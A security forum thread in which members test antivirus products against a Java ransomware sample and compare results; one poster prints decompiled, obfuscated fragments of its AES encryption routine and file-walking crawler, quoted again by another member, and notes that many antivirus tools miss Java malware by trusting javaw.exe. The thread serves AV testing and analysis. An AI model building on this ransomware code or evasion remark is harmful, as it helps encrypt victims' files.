Q&A Is F-Secure sleeping again?

Status
Not open for further replies.

McMcbrad

Level 23
Oct 16, 2020
1,252
@marcopaone @McMcbrad Thank you both for testing Defender(y)
The ransomware protection of AVG/Avast prevented the encryption of documents/pictures, could Controlled Folder Access of Defender do the same?
It was on and protecting all folders that go there by default:
1607283235679.png
 

McMcbrad

Level 23
Oct 16, 2020
1,252
There is something which I highlighted in my Avast review, somewhere as a comment.

Many AVs don't see a java app as a separate program - they see the javaw.exe process which is whitelisted and allow it to do whatever - this is why Java ransomware (as well as all Java malware) is not to be underestimated.
Avast/AVG see *.jar files as individual programs and block them from encrypting/decrypting, accessing browser passwords and sensitive files, as well as accessing the webcam.
 

McMcbrad

Level 23
Oct 16, 2020
1,252
By request:
McAfee LiveSafe 16.0 R29 (latest) + Shadow Defender Latest + Windows 10 20H2 (latest)
1607283997544.png


Static Scan detects nothing:
1607284071814.png


Upon execution, outcome is same like with Windows Defender:
File on desktop dropped and auto-opened
1607284109025.png


I kissed my screenshots of conversations with hackers via RATs goodbye:
1607284208510.png
 

MacDefender

Level 14
Verified
Oct 13, 2019
639
If this is bypassing CFA it must be using some sort of special technique to encrypt. CFA is very protective and doesn’t have much of a whitelist, it also causes a lot of false positives.
That’s probably part of why DeepGuard was defeated.
It might be worth trying some of the other strong behavior blockers like Kaspersky or Emsisoft.
 

McMcbrad

Level 23
Oct 16, 2020
1,252
If this is bypassing CFA it must be using some sort of special technique to encrypt. CFA is very protective and doesn’t have much of a whitelist, it also causes a lot of false positives.
That’s probably part of why DeepGuard was defeated.
It might be worth trying some of the other strong behavior blockers like Kaspersky or Emsisoft.
Nothing too unusual.
Encryption algorithm:
import java.nio.file.Path;
import java.nio.file.SimpleFileVisitor;
import java.security.Key;
import java.security.NoSuchAlgorithmException;
import javax.crypto.Cipher;
import javax.crypto.KeyGenerator;
import javax.crypto.NoSuchPaddingException;
public /* synthetic */ encryptAes() throws NoSuchAlgorithmException, NoSuchPaddingException {
encryptAes encryptAes2;
encryptAes2.keyGenerator = KeyGenerator.getInstance(Main$Open.β€ˆβ€†β€‰β€((Object)β€ƒβ€‚β€β€Š[1], (int)-970469275));
encryptAes2.encrypter = Cipher.getInstance(Main$Open.β€ˆβ€†β€‰β€((Object)β€ƒβ€‚β€β€Š[2], (int)-704451753));
encryptAes2.keyGenerator.init(128);
encryptAes2.key = encryptAes2.keyGenerator.generateKey();
File crawler and main algorithm
import java.util.HashMap;
encryptAes encryptAes2 = new encryptAes(); <---- instantiates the class with the code above
Files.walkFileTree(Paths.get(System.getProperty(Main$Open.β€ˆβ€†β€‰β€((Object)β€„β€Žβ€‚β€Œ[0], (int)-601438172)) + Main$Open.β€ˆβ€†β€‰β€((Object)β€„β€Žβ€‚β€Œ[1], (int)-1877012877), new String[0]), (FileVisitor<? super Path>)((Object)encryptAes2));
Files.walkFileTree(Paths.get(System.getProperty(Main$Open.β€ˆβ€†β€‰β€((Object)β€„β€Žβ€‚β€Œ[2], (int)1693082425)) + Main$Open.β€ˆβ€†β€‰β€((Object)β€„β€Žβ€‚β€Œ[3], (int)54234075), new String[0]), (FileVisitor<? super Path>)((Object)encryptAes2));
Files.walkFileTree(Paths.get(System.getProperty(Main$Open.β€ˆβ€†β€‰β€((Object)β€„β€Žβ€‚β€Œ[4], (int)-557160074)) + Main$Open.β€ˆβ€†β€‰β€((Object)β€„β€Žβ€‚β€Œ[5], (int)-135269237), new String[0]), (FileVisitor<? super Path>)((Object)encryptAes2));
Files.walkFileTree(Paths.get(System.getProperty(Main$Open.β€ˆβ€†β€‰β€((Object)β€„β€Žβ€‚β€Œ[6], (int)-504606357)) + Main$Open.β€ˆβ€†β€‰β€((Object)β€„β€Žβ€‚β€Œ[7], (int)72707544), new String[0]), (FileVisitor<? super Path>)((Object)encryptAes2));
Files.walkFileTree(Paths.get(System.getProperty(Main$Open.β€ˆβ€†β€‰β€((Object)β€„β€Žβ€‚β€Œ[8], (int)713534176)) + Main$Open.β€ˆβ€†β€‰β€((Object)β€„β€Žβ€‚β€Œ[9], (int)-969383075), new String[0]), (FileVisitor<? super Path>)((Object)encryptAes2));
Files.walkFileTree(Paths.get(System.getProperty(Main$Open.β€ˆβ€†β€‰β€((Object)β€„β€Žβ€‚β€Œ[10], (int)1242977540)) + Main$Open.β€ˆβ€†β€‰β€((Object)β€„β€Žβ€‚β€Œ[11], (int)906653621), new String[0]), (FileVisitor<? super Path>)((Object)encryptAes2));
}
These are built-in Java 6 libraries and not even loaded from GitHub.
 
Last edited:

KonradPL

Level 4
May 1, 2018
169
Nothing too unusual.
Encryption algorithm:
import java.nio.file.Path;
import java.nio.file.SimpleFileVisitor;
import java.security.Key;
import java.security.NoSuchAlgorithmException;
import javax.crypto.Cipher;
import javax.crypto.KeyGenerator;
import javax.crypto.NoSuchPaddingException;
public /* synthetic */ encryptAes() throws NoSuchAlgorithmException, NoSuchPaddingException {
encryptAes encryptAes2;
encryptAes2.keyGenerator = KeyGenerator.getInstance(Main$Open.β€ˆβ€†β€‰β€((Object)β€ƒβ€‚β€β€Š[1], (int)-970469275));
encryptAes2.encrypter = Cipher.getInstance(Main$Open.β€ˆβ€†β€‰β€((Object)β€ƒβ€‚β€β€Š[2], (int)-704451753));
encryptAes2.keyGenerator.init(128);
encryptAes2.key = encryptAes2.keyGenerator.generateKey();
File crawler and main algorithm
import java.util.HashMap;
encryptAes encryptAes2 = new encryptAes();
Files.walkFileTree(Paths.get(System.getProperty(Main$Open.β€ˆβ€†β€‰β€((Object)β€„β€Žβ€‚β€Œ[0], (int)-601438172)) + Main$Open.β€ˆβ€†β€‰β€((Object)β€„β€Žβ€‚β€Œ[1], (int)-1877012877), new String[0]), (FileVisitor<? super Path>)((Object)encryptAes2));
Files.walkFileTree(Paths.get(System.getProperty(Main$Open.β€ˆβ€†β€‰β€((Object)β€„β€Žβ€‚β€Œ[2], (int)1693082425)) + Main$Open.β€ˆβ€†β€‰β€((Object)β€„β€Žβ€‚β€Œ[3], (int)54234075), new String[0]), (FileVisitor<? super Path>)((Object)encryptAes2));
Files.walkFileTree(Paths.get(System.getProperty(Main$Open.β€ˆβ€†β€‰β€((Object)β€„β€Žβ€‚β€Œ[4], (int)-557160074)) + Main$Open.β€ˆβ€†β€‰β€((Object)β€„β€Žβ€‚β€Œ[5], (int)-135269237), new String[0]), (FileVisitor<? super Path>)((Object)encryptAes2));
Files.walkFileTree(Paths.get(System.getProperty(Main$Open.β€ˆβ€†β€‰β€((Object)β€„β€Žβ€‚β€Œ[6], (int)-504606357)) + Main$Open.β€ˆβ€†β€‰β€((Object)β€„β€Žβ€‚β€Œ[7], (int)72707544), new String[0]), (FileVisitor<? super Path>)((Object)encryptAes2));
Files.walkFileTree(Paths.get(System.getProperty(Main$Open.β€ˆβ€†β€‰β€((Object)β€„β€Žβ€‚β€Œ[8], (int)713534176)) + Main$Open.β€ˆβ€†β€‰β€((Object)β€„β€Žβ€‚β€Œ[9], (int)-969383075), new String[0]), (FileVisitor<? super Path>)((Object)encryptAes2));
Files.walkFileTree(Paths.get(System.getProperty(Main$Open.β€ˆβ€†β€‰β€((Object)β€„β€Žβ€‚β€Œ[10], (int)1242977540)) + Main$Open.β€ˆβ€†β€‰β€((Object)β€„β€Žβ€‚β€Œ[11], (int)906653621), new String[0]), (FileVisitor<? super Path>)((Object)encryptAes2));
}
These are built-in Java 6 libraries and not even loaded from GitHub.
What about eset? Maybe Eset can do better?
 

McMcbrad

Level 23
Oct 16, 2020
1,252
In newspapers they say that 2021 there will be a new wave : Ransomware 2.0
So be careful and stay protected !
They say things like this every year...in newspapers every year will be the coldest from 30 years onwards, threats will evade all AVs and more...
It won't take long before vendors perfect the detection of the new ransomware as well :D
How many new threat types have come up in the last few years and they are all well-handled.
 
Status
Not open for further replies.
Top